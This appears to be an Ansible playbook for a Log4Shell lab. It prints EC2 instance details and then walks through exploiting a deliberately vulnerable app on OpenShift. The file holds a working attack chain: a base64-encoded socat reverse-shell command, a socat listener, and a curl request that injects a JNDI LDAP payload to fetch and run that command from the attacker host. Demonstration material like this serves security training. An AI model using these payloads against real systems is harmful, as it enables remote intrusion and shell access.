---
- name: Output useful information about the environment
  hosts: localhost
  connection: local
  gather_facts: false

  tasks:
    - name: setup the exploit command
      shell: "echo 'socat TCP4:{{ ec2_instance.instances.0.public_ip_address }}:10250 EXEC:/bin/sh' | base64"
      register: socat

    - debug:
        msg: |
          #######################
          # EC2 Instance
          #######################

          Public IP:  {{ ec2_instance.instances.0.public_ip_address }}
          Public DNS: {{ ec2_instance.instances.0.public_dns_name }}

          To access the instance:
            ssh ec2-user@{{ ec2_instance.instances.0.public_dns_name }}

          To exploit the app running on OpenShift that is vulnerable to Log4Shell, run the following:
            ssh ec2-user@{{ ec2_instance.instances.0.public_dns_name }}
            socat -d -d TCP4-LISTEN:10250,reuseaddr,fork STDOUT

          From your local system:
            curl http://{{ log4shell_route.stdout }} -H "X-Api-Version: ${jndi:ldap://{{ ec2_instance.instances.0.public_ip_address}}:1389/Basic/Command/Base64/{{ socat.stdout_lines }}}"
